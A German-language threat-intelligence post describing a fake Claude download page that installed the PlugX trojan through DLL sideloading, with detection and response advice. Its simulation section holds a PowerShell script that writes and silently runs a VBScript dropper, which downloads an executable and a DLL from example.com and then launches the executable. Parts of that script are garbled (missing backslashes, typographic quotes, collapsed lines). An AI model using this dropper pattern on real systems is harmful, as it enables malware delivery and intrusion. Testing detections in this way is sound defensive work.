SOC Prime Bias: Medium

14 Apr 2026 15:55 UTC

Gefälschte Claude-Seite installiert Malware, die Angreifern Zugriff auf Ihren Computer gewährt

Author Photo
SOC Prime Team linkedin icon Folgen
Gefälschte Claude-Seite installiert Malware, die Angreifern Zugriff auf Ihren Computer gewährt
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Angreifer richteten eine gefälschte Claude-Download-Seite ein, die ein mit Trojanern versehenes ZIP-Archiv an ahnungslose Benutzer lieferte. Nach dem Öffnen installierte das Archiv einen scheinbar legitimen Claude-Desktop-Client, während es verdeckt den PlugX-Remote-Access-Trojaner durch DLL-Sideloading mit einem signierten G DATA-Updater bereitstellte. Die bösartige Nutzlast wurde im Startup-Ordner des Benutzers platziert, um persistente Verbindungen aufrechtzuerhalten, und initiierte dann ausgehende HTTPS-Kommunikation mit einem Command-and-Control-Server. Die Kampagne zeigt, wie Bedrohungsakteure zunehmend das Interesse an beliebten KI-Tools als Social-Engineering-Köder für den ersten Kompromiss ausnutzen.

Untersuchung

Während der Analyse packten Forscher das ZIP-Archiv aus, identifizierten den MSI-Installationspfad und verfolgten die Ausführung bis zu einem VBScript-Dropper, der NOVUpdate.exe, eine bösartige avk.dll, und eine verschlüsselte Daten-Datei in den Startup-Ordner schrieb. Sandbox-Ausführung bestätigte, dass die geladene Binärdatei erfolgreich gestartet wurde, einen TCP/IP-bezogenen Registrierungsschlüssel veränderte und ausgehende Verbindungen über Port 443 zu einer von Alibaba Cloud gehosteten IP-Adresse initiierte. Diese Ergebnisse bestätigten die Bereitstellung von PlugX durch eine gestufte Infektionskette, die als legitime KI-Software getarnt ist.

Minderung

Benutzer sollten Claude-Software nur von verifizierten offiziellen Quellen herunterladen und die Authentizität der Installationspakete vor der Ausführung überprüfen. Verteidiger sollten Startup-Ordner auf unerwartete Binärdateien oder DLLs überprüfen, insbesondere Dateien, die legitiemen Update-Komponenten ähneln. Firewall- und Endpunkt-Telemetrie sollten ebenfalls auf verdächtigen ausgehenden HTTPS-Verkehr geprüft werden, der mit neu installierten Anwendungen verbunden ist. Das Entfernen der bösartigen Dateien, das Rückgängigmachen nicht autorisierter Registrierungsänderungen und das Durchführen eines vertrauenswürdigen Antimalware-Scans sind entscheidende Schritte zur Eindämmung der Bedrohung.

Antwort

Sicherheitsteams sollten die Anwesenheit von NOVUpdate.exe, avk.dll, oder NOVUpdate.exe.dat im Startup-Verzeichnis erkennen und melden. Weitere Erkennungen sollten sich auf signierte G DATA-Updater-Binärdateien konzentrieren, die nicht vertrauenswürdige DLLs laden und unerwartete ausgehende TLS-Sitzungen zur identifizierten Infrastruktur aufbauen. Betroffene Hosts sollten eine vollständige Bereinigung und forensische Überprüfung durchlaufen, um zu bestätigen, dass keine anderen PlugX-Komponenten, Persistenzmechanismen oder Folgelasten aktiv bleiben.

Angriffsverlauf

Simulation der Ausführung

Voraussetzung: Die Telemetrie- und Basisvorprüfungen müssen bestanden worden sein.

Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der Angreifer-Technik (TTP), die die Erkennungsregel auslösen soll. Die Befehle und die Erzählung MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, genau die Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.

  • Angriffsbericht & Befehle:
    Ein Angreifer erstellt ein bösartiges VBS-Skript, das die Nutzlast herunterlädt NOVUpdate.exe von einem Command-and-Control (C2) Server, speichert es in %TEMP%, und startet es dann über wscript.exe. Das gleiche Skript lädt auch avk.dll vom selben Standort, um DLL-Sideloading zu erreichen. Der Angreifer verlässt sich auf den eingebauten Windows Script Host (WSH), um keine Aufmerksamkeit durch traditionelle AV-Heuristiken zu erregen.

    1. Die bösartige VBS-Datei schreiben (malicious.vbs) zu %TEMP%.
    2. Aufruf wscript.exe mit dem Pfad zur VBS-Datei.
    3. Das VBS-Skript führt ein HTTP GET aus, um NOVUpdate.exe and avk.dllabzurufen, speichert sie auf der Festplatte und führt NOVUpdate.exe.
  • Regressionstest-Skript:

    # --------------------------------------------------------------------
    # Simulation des bösartigen Droppers – löst die Sigma-Regel aus
    # --------------------------------------------------------------------
    $tempDir = "$env:TEMPDropperDemo"
    New-Item -ItemType Directory -Path $tempDir -Force | Out-Null
    
    # 1. Erstellen eines bösartigen VBS, das zwei Dateien herunterlädt und NOVUpdate.exe ausführt
    $vbsPath = "$tempDirmalicious.vbs"
    $vbsContent = @"
    Set objXML = CreateObject("Microsoft.XMLHTTP")
    objXML.open "GET", "http://example.com/NOVUpdate.exe", False
    objXML.send
    If objXML.Status = 200 Then
    Set objStream = CreateObject("ADODB.Stream")
    objStream.Type = 1
    objStream.Open
    objStream.Write objXML.ResponseBody
    objStream.SaveToFile "$tempDirNOVUpdate.exe", 2
    objStream.Close
    End If

‚ Download avk.dll (wird für DLL-Sideloading verwendet) objXML.open „GET“, „http://example.com/avk.dll„, False objXML.send If objXML.Status = 200 Then Set objStream = CreateObject(„ADODB.Stream“) objStream.Type = 1 objStream.Open objStream.Write objXML.ResponseBody objStream.SaveToFile „$tempDiravk.dll“, 2 objStream.Close End If

‚ Führen Sie die abgelegte EXE aus CreateObject(„WScript.Shell“).Run „““$tempDirNOVUpdate.exe“““, 0, False „@ Set-Content -Path $vbsPath -Value $vbsContent -Encoding ASCII

# 2. Führen Sie das Skript über wscript.exe aus (dies ist die Telemetrie, die wir testen)
$wscript = "$env:SystemRootSystem32wscript.exe"
Start-Process -FilePath $wscript -ArgumentList "`"$vbsPath`"" -WindowStyle Hidden

# OPTIONAL: Pause für die Erkennung
Start-Sleep -Seconds 10
# --------------------------------------------------------------------
  • Bereinigungskommandos:

    # Entfernen Sie alle durch die Simulation erstellten Artefakte
    $tempDir = "$env:TEMPDropperDemo"
    if (Test-Path $tempDir) {
        Remove-Item -Path $tempDir -Recurse -Force
    }
    
    # Stellen Sie sicher, dass alle verbleibenden NOVUpdate.exe Prozesse beendet werden
    Get-Process -Name "NOVUpdate" -ErrorAction SilentlyContinue | Stop-Process -Force